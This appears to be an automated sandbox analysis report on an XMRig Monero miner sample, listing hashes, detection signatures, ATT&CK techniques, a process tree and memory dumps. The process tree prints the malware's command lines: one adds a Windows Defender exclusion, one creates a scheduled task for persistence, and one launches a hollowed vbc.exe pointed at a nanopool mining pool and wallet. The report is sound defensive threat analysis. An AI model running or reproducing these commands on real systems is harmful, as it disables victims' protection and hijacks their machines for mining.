xmrig | cffc73850abfc4ca8cd6bc11ef77d8d91926046ee77e444de2c387061260f44b

Analysis

max time kernel
93s
max time network
171s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
23-11-2022 09:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

1.4MB
MD5

fb21c01c3d8d6b321034d48518c3d2a0
SHA1

372e822ce100a56d5066fce4574b9b0833daf27c
SHA256

cffc73850abfc4ca8cd6bc11ef77d8d91926046ee77e444de2c387061260f44b
SHA512

81902613230b6ebfdb4bedc7e352aa73b0d011a4bd5fe5734a6486bfc2a25393230b9a7e3136717d61d552d8873acc775c4d9a96d5bd0e8c15ac10179dce0edf
SSDEEP

24576:MiCj1Tnwpevq7BZlrkY/wP91wSRXZZAvnn3h:MR1Twpevq7HJkY4nwSRXIPn

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1684-142-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1684-144-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1684-146-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1684-147-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1684-157-0x0000000140343234-mapping.dmp	xmrig
behavioral1/memory/1684-161-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1684-163-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

OWT.exe

pid process

1756 OWT.exe
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

1948 cmd.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 1 IoCs

Processes:

OWT.exe

description pid process target process

PID 1756 set thread context of 1684 1756 OWT.exe vbc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1516 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1160 timeout.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exeOWT.exe

pid process

1816 powershell.exe
812 powershell.exe
1756 OWT.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

460

pid	process
1756	OWT.exe

pid	process
1948	cmd.exe

description	pid	process	target process
PID 1756 set thread context of 1684	1756	OWT.exe	vbc.exe

pid	process
1516	schtasks.exe

pid	process
1160	timeout.exe

pid	process
1816	powershell.exe
812	powershell.exe
1756	OWT.exe

pid	process
460

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

file.exepowershell.exeOWT.exepowershell.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	1392	file.exe
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeDebugPrivilege	1756	OWT.exe
Token: SeDebugPrivilege	812	powershell.exe
Token: SeLockMemoryPrivilege	1684	vbc.exe
Token: SeLockMemoryPrivilege	1684	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

vbc.exe

pid process

1684 vbc.exe

pid	process
1684	vbc.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

file.execmd.exeOWT.execmd.exe

description	pid	process	target process
PID 1392 wrote to memory of 1816	1392	file.exe	powershell.exe
PID 1392 wrote to memory of 1816	1392	file.exe	powershell.exe
PID 1392 wrote to memory of 1816	1392	file.exe	powershell.exe
PID 1392 wrote to memory of 1948	1392	file.exe	cmd.exe
PID 1392 wrote to memory of 1948	1392	file.exe	cmd.exe
PID 1392 wrote to memory of 1948	1392	file.exe	cmd.exe
PID 1948 wrote to memory of 1160	1948	cmd.exe	timeout.exe
PID 1948 wrote to memory of 1160	1948	cmd.exe	timeout.exe
PID 1948 wrote to memory of 1160	1948	cmd.exe	timeout.exe
PID 1948 wrote to memory of 1756	1948	cmd.exe	OWT.exe
PID 1948 wrote to memory of 1756	1948	cmd.exe	OWT.exe
PID 1948 wrote to memory of 1756	1948	cmd.exe	OWT.exe
PID 1756 wrote to memory of 812	1756	OWT.exe	powershell.exe
PID 1756 wrote to memory of 812	1756	OWT.exe	powershell.exe
PID 1756 wrote to memory of 812	1756	OWT.exe	powershell.exe
PID 1756 wrote to memory of 1636	1756	OWT.exe	cmd.exe
PID 1756 wrote to memory of 1636	1756	OWT.exe	cmd.exe
PID 1756 wrote to memory of 1636	1756	OWT.exe	cmd.exe
PID 1636 wrote to memory of 1516	1636	cmd.exe	schtasks.exe
PID 1636 wrote to memory of 1516	1636	cmd.exe	schtasks.exe
PID 1636 wrote to memory of 1516	1636	cmd.exe	schtasks.exe
PID 1756 wrote to memory of 1684	1756	OWT.exe	vbc.exe
PID 1756 wrote to memory of 1684	1756	OWT.exe	vbc.exe
PID 1756 wrote to memory of 1684	1756	OWT.exe	vbc.exe
PID 1756 wrote to memory of 1684	1756	OWT.exe	vbc.exe
PID 1756 wrote to memory of 1684	1756	OWT.exe	vbc.exe
PID 1756 wrote to memory of 1684	1756	OWT.exe	vbc.exe
PID 1756 wrote to memory of 1684	1756	OWT.exe	vbc.exe
PID 1756 wrote to memory of 1684	1756	OWT.exe	vbc.exe
PID 1756 wrote to memory of 1684	1756	OWT.exe	vbc.exe
PID 1756 wrote to memory of 1684	1756	OWT.exe	vbc.exe
PID 1756 wrote to memory of 1684	1756	OWT.exe	vbc.exe
PID 1756 wrote to memory of 1684	1756	OWT.exe	vbc.exe
PID 1756 wrote to memory of 1684	1756	OWT.exe	vbc.exe
PID 1756 wrote to memory of 1684	1756	OWT.exe	vbc.exe
PID 1756 wrote to memory of 1684	1756	OWT.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp41F1.tmp.bat""
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1948

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:1160

C:\ProgramData\winrar\OWT.exe
"C:\ProgramData\winrar\OWT.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1756

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:812

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:1636

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"
5⤵
- Creates scheduled task(s)
PID:1516

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1684

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\winrar\OWT.exe

Filesize
1.4MB

MD5
fb21c01c3d8d6b321034d48518c3d2a0

SHA1
372e822ce100a56d5066fce4574b9b0833daf27c

SHA256
cffc73850abfc4ca8cd6bc11ef77d8d91926046ee77e444de2c387061260f44b

SHA512
81902613230b6ebfdb4bedc7e352aa73b0d011a4bd5fe5734a6486bfc2a25393230b9a7e3136717d61d552d8873acc775c4d9a96d5bd0e8c15ac10179dce0edf

Download Submit
C:\ProgramData\winrar\OWT.exe

Filesize
1.4MB

MD5
fb21c01c3d8d6b321034d48518c3d2a0

SHA1
372e822ce100a56d5066fce4574b9b0833daf27c

SHA256
cffc73850abfc4ca8cd6bc11ef77d8d91926046ee77e444de2c387061260f44b

SHA512
81902613230b6ebfdb4bedc7e352aa73b0d011a4bd5fe5734a6486bfc2a25393230b9a7e3136717d61d552d8873acc775c4d9a96d5bd0e8c15ac10179dce0edf

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp41F1.tmp.bat

Filesize
138B

MD5
32bc623afcb333570ac5fafbb14ce808

SHA1
b2b732d858f3a95e3e73ad9499bdf82eaabef61a

SHA256
39735caa8dbce4cfe8c666897ad137692dcc18533f58e39e8069a4217363d8b3

SHA512
5f3e9bc4ba2b718d584703eaa535de15954e78f76bfcd48cdbdc2c39892e0ef79b89f5ea74162757a7f65964ae05ed1d87505b48d99a7696718226edb36a03db

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
004655c56f7c405d92a52e11d3cc767e

SHA1
c30b65a0954e9c9e6126935d461781f122eef433

SHA256
06010f234a05dbaad761f5d8963139079ec4f2638369aa2d5dd824495c2caff9

SHA512
6e065576f77adb62e139b28e0bbb8a610c89e975929f4c9b1024f037b2b137594dc95752833d684a361d2faee3d6cbb7a0889fde09c9e5f3e73ad262e9c242cf

Download Submit
\ProgramData\winrar\OWT.exe

Filesize
1.4MB

MD5
fb21c01c3d8d6b321034d48518c3d2a0

SHA1
372e822ce100a56d5066fce4574b9b0833daf27c

SHA256
cffc73850abfc4ca8cd6bc11ef77d8d91926046ee77e444de2c387061260f44b

SHA512
81902613230b6ebfdb4bedc7e352aa73b0d011a4bd5fe5734a6486bfc2a25393230b9a7e3136717d61d552d8873acc775c4d9a96d5bd0e8c15ac10179dce0edf

Download Submit
memory/812-123-0x0000000002444000-0x0000000002447000-memory.dmp

Filesize
12KB

Download
memory/812-120-0x0000000002444000-0x0000000002447000-memory.dmp

Filesize
12KB

Download
memory/812-118-0x000007FEEBF50000-0x000007FEECAAD000-memory.dmp

Filesize
11.4MB

Download
memory/812-119-0x000000001B750000-0x000000001BA4F000-memory.dmp

Filesize
3.0MB

Download
memory/812-124-0x000000000244B000-0x000000000246A000-memory.dmp

Filesize
124KB

Download
memory/812-117-0x000007FEECAB0000-0x000007FEED4D3000-memory.dmp

Filesize
10.1MB

Download
memory/812-110-0x0000000000000000-mapping.dmp

Download
memory/1160-79-0x0000000000000000-mapping.dmp

Download
memory/1392-61-0x000007FEFD070000-0x000007FEFD0DC000-memory.dmp

Filesize
432KB

Download
memory/1392-65-0x000007FEF6590000-0x000007FEF6687000-memory.dmp

Filesize
988KB

Download
memory/1392-67-0x000007FEF5960000-0x000007FEF634C000-memory.dmp

Filesize
9.9MB

Download
memory/1392-68-0x000007FEFED60000-0x000007FEFEE8D000-memory.dmp

Filesize
1.2MB

Download
memory/1392-69-0x000007FEFF0F0000-0x000007FEFF2F3000-memory.dmp

Filesize
2.0MB

Download
memory/1392-70-0x000007FEFB7C0000-0x000007FEFB816000-memory.dmp

Filesize
344KB

Download
memory/1392-71-0x0000000000E30000-0x0000000000FF8000-memory.dmp

Filesize
1.8MB

Download
memory/1392-72-0x000007FEF6460000-0x000007FEF658C000-memory.dmp

Filesize
1.2MB

Download
memory/1392-76-0x000007FEFEB60000-0x000007FEFEB7F000-memory.dmp

Filesize
124KB

Download
memory/1392-80-0x0000000000E30000-0x0000000000FF8000-memory.dmp

Filesize
1.8MB

Download
memory/1392-81-0x0000000000660000-0x00000000006A1000-memory.dmp

Filesize
260KB

Download
memory/1392-66-0x000007FEFF010000-0x000007FEFF0EB000-memory.dmp

Filesize
876KB

Download
memory/1392-55-0x000007FEF6900000-0x000007FEF696F000-memory.dmp

Filesize
444KB

Download
memory/1392-56-0x000007FEF6860000-0x000007FEF68FC000-memory.dmp

Filesize
624KB

Download
memory/1392-64-0x0000000000660000-0x00000000006A1000-memory.dmp

Filesize
260KB

Download
memory/1392-63-0x0000000000E30000-0x0000000000FF8000-memory.dmp

Filesize
1.8MB

Download
memory/1392-62-0x000007FEFEF70000-0x000007FEFEFE1000-memory.dmp

Filesize
452KB

Download
memory/1392-60-0x0000000076FE0000-0x00000000770FF000-memory.dmp

Filesize
1.1MB

Download
memory/1392-59-0x000007FEFE550000-0x000007FEFE5EF000-memory.dmp

Filesize
636KB

Download
memory/1392-58-0x0000000077100000-0x00000000771FA000-memory.dmp

Filesize
1000KB

Download
memory/1392-57-0x000007FEFD440000-0x000007FEFD4A7000-memory.dmp

Filesize
412KB

Download
memory/1516-114-0x0000000000000000-mapping.dmp

Download
memory/1636-112-0x0000000000000000-mapping.dmp

Download
memory/1684-164-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/1684-137-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1684-138-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1684-140-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1684-142-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1684-144-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1684-146-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1684-147-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1684-157-0x0000000140343234-mapping.dmp

Download
memory/1684-161-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1684-162-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/1684-163-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1756-102-0x000007FEFF010000-0x000007FEFF0EB000-memory.dmp

Filesize
876KB

Download
memory/1756-107-0x0000000000830000-0x00000000009F8000-memory.dmp

Filesize
1.8MB

Download
memory/1756-108-0x0000000000830000-0x00000000009F8000-memory.dmp

Filesize
1.8MB

Download
memory/1756-106-0x000007FEFB7C0000-0x000007FEFB816000-memory.dmp

Filesize
344KB

Download
memory/1756-104-0x000007FEFED60000-0x000007FEFEE8D000-memory.dmp

Filesize
1.2MB

Download
memory/1756-105-0x000007FEFF0F0000-0x000007FEFF2F3000-memory.dmp

Filesize
2.0MB

Download
memory/1756-103-0x000007FEF4F70000-0x000007FEF595C000-memory.dmp

Filesize
9.9MB

Download
memory/1756-101-0x000007FEF6490000-0x000007FEF6587000-memory.dmp

Filesize
988KB

Download
memory/1756-99-0x000007FEFD070000-0x000007FEFD0DC000-memory.dmp

Filesize
432KB

Download
memory/1756-100-0x000007FEFEF70000-0x000007FEFEFE1000-memory.dmp

Filesize
452KB

Download
memory/1756-116-0x000007FEFB4F0000-0x000007FEFB705000-memory.dmp

Filesize
2.1MB

Download
memory/1756-121-0x000007FEFEE90000-0x000007FEFEF67000-memory.dmp

Filesize
860KB

Download
memory/1756-95-0x0000000077100000-0x00000000771FA000-memory.dmp

Filesize
1000KB

Download
memory/1756-122-0x000007FEFEB60000-0x000007FEFEB7F000-memory.dmp

Filesize
124KB

Download
memory/1756-93-0x000007FEFD440000-0x000007FEFD4A7000-memory.dmp

Filesize
412KB

Download
memory/1756-94-0x00000000007E0000-0x0000000000821000-memory.dmp

Filesize
260KB

Download
memory/1756-125-0x000007FEFC990000-0x000007FEFC9B2000-memory.dmp

Filesize
136KB

Download
memory/1756-126-0x000007FEFC840000-0x000007FEFC857000-memory.dmp

Filesize
92KB

Download
memory/1756-127-0x000007FEFA420000-0x000007FEFA43C000-memory.dmp

Filesize
112KB

Download
memory/1756-128-0x000007FEF0EB0000-0x000007FEF0F12000-memory.dmp

Filesize
392KB

Download
memory/1756-129-0x000007FEFEB90000-0x000007FEFEBDD000-memory.dmp

Filesize
308KB

Download
memory/1756-130-0x000007FEF93D0000-0x000007FEF9434000-memory.dmp

Filesize
400KB

Download
memory/1756-131-0x000007FEF9440000-0x000007FEF94B1000-memory.dmp

Filesize
452KB

Download
memory/1756-132-0x000007FEFCE10000-0x000007FEFCE35000-memory.dmp

Filesize
148KB

Download
memory/1756-133-0x000007FEFAC40000-0x000007FEFAC67000-memory.dmp

Filesize
156KB

Download
memory/1756-134-0x000007FEFD110000-0x000007FEFD146000-memory.dmp

Filesize
216KB

Download
memory/1756-135-0x000007FEFC660000-0x000007FEFC6BB000-memory.dmp

Filesize
364KB

Download
memory/1756-136-0x0000000000830000-0x00000000009F8000-memory.dmp

Filesize
1.8MB

Download
memory/1756-96-0x0000000000830000-0x00000000009F8000-memory.dmp

Filesize
1.8MB

Download
memory/1756-98-0x0000000076FE0000-0x00000000770FF000-memory.dmp

Filesize
1.1MB

Download
memory/1756-97-0x000007FEFE550000-0x000007FEFE5EF000-memory.dmp

Filesize
636KB

Download
memory/1756-92-0x000007FEF67F0000-0x000007FEF688C000-memory.dmp

Filesize
624KB

Download
memory/1756-91-0x000007FEF6890000-0x000007FEF68FF000-memory.dmp

Filesize
444KB

Download
memory/1756-87-0x0000000000000000-mapping.dmp

Download
memory/1816-84-0x00000000023F4000-0x00000000023F7000-memory.dmp

Filesize
12KB

Download
memory/1816-83-0x00000000023F4000-0x00000000023F7000-memory.dmp

Filesize
12KB

Download
memory/1816-82-0x000007FEF57F0000-0x000007FEF634D000-memory.dmp

Filesize
11.4MB

Download
memory/1816-78-0x000007FEECB20000-0x000007FEED543000-memory.dmp

Filesize
10.1MB

Download
memory/1816-74-0x000007FEFBA81000-0x000007FEFBA83000-memory.dmp

Filesize
8KB

Download
memory/1816-73-0x0000000000000000-mapping.dmp

Download
memory/1816-85-0x00000000023FB000-0x000000000241A000-memory.dmp

Filesize
124KB

Download
memory/1948-75-0x0000000000000000-mapping.dmp

Download